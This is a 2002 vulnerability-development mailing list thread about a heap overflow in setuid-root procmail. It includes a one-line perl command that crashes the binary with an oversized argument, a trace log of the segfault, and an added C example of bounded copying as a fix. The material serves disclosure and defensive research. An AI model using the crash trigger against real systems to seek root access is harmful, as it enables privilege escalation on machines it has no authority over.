Vulnerability Development mailing list archives
Re: procmail heap overflow
From: KF <dotslash () snosoft com>
Date: Wed, 19 Jun 2002 00:46:29 -0400
I believe we (one of our researchers "dvdman") were messing with this a few months back ... we never finished up our research ... here's what I found in an old strace log...

-KF

malloc(86) = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096) = 0x0805e0c4
strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setuid(506) = 0
setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
malloc(81) = 0x0805e120
memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0) = 2
memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0) = 17
memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
write(2, "procmail: Exceeded LINEBUF\n", 27) = 27
strchr("PROCMAIL_OVERFLOW=yes", '=') = "=yes"
strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15
strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

-KF

SpaceWalker wrote:

> $ procmail -v
> procmail v3.15.1 2001/01/08
> $ procmail `perl -e '{print "A"x10240}'`=A
> waits indefinitely
>
> Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.
>
> On Wed, 19 Jun 2002 02:38:08 +0200 flatline <flatline () blackhat nl> wrote:
>
>> hi, i found a heap overflow in procmail (up until latest) some time ago.
>>
>> flatline@intra:/usr/bin$ ls -la procmail
>> -rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail*
>> flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
>> procmail: Exceeded LINEBUF
>> Segmentation fault
>> flatline@intra:/usr/bin$
>>
>> at first it seemed to properly drop privs before segging, but not too long ago i managed to make it crash while it still had euid 0. segfaults have been seen on red hat/slackware linux and bsd variants. successful exploitation has not been verified.
>>
>> / flatline
>>
>> greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
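In the trace above the "Exceeded LINEBUF" message is written only after the strncpy of the oversized argument has already run with a bound of 10000, a limit that is not taken from the destination buffer. The following is an added example (not procmail's code and not from anyone in this thread) of the defensive shape for copying a NAME=value argument into a fixed line buffer: the bound comes from the destination, and an argument that does not fit is refused before a single byte is copied. LINEBUF_SIZE is an assumed value; procmail's real buffer size is not on the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed capacity; procmail's actual LINEBUF value is not given in the thread. */
#define LINEBUF_SIZE 128

/* Copy a "NAME=value" command-line assignment into a fixed-size line buffer.
 * The length check uses the destination's capacity and happens before any
 * write, so an overlong argument is reported instead of copied and then
 * diagnosed. Returns 0 on success, -1 if the argument (with its terminating
 * NUL) does not fit, -2 if it is not an assignment at all. */
int copy_assignment_bounded(char *dst, size_t dstsz, const char *arg)
{
    const char *nul = memchr(arg, '\0', dstsz);  /* is there a NUL within dstsz bytes? */
    if (nul == NULL) {
        if (dstsz) dst[0] = '\0';
        return -1;                               /* would overrun dst: refuse */
    }
    if (memchr(arg, '=', (size_t)(nul - arg)) == NULL)
        return -2;                               /* no '=': not an assignment */
    memcpy(dst, arg, (size_t)(nul - arg) + 1);   /* copy including the NUL */
    return 0;
}

/* Constructed sample: the thread's test argument, 10240 'A's followed by "=A". */
int demo_oversized_assignment(void)
{
    static char arg[10240 + 3];
    char buf[LINEBUF_SIZE];
    memset(arg, 'A', 10240);
    memcpy(arg + 10240, "=A", 3);
    return copy_assignment_bounded(buf, sizeof buf, arg);  /* -1: refused before copying */
}

/* Constructed sample: a short assignment that fits; returns 1 when copied intact. */
int demo_short_assignment(void)
{
    char buf[LINEBUF_SIZE];
    int rc = copy_assignment_bounded(buf, sizeof buf, "PROCMAIL_OVERFLOW=yes");
    return rc == 0 && strcmp(buf, "PROCMAIL_OVERFLOW=yes") == 0;
}

int main(void)
{
    printf("oversized arg -> %d, short arg ok -> %d\n",
           demo_oversized_assignment(), demo_short_assignment());
    return 0;
}
```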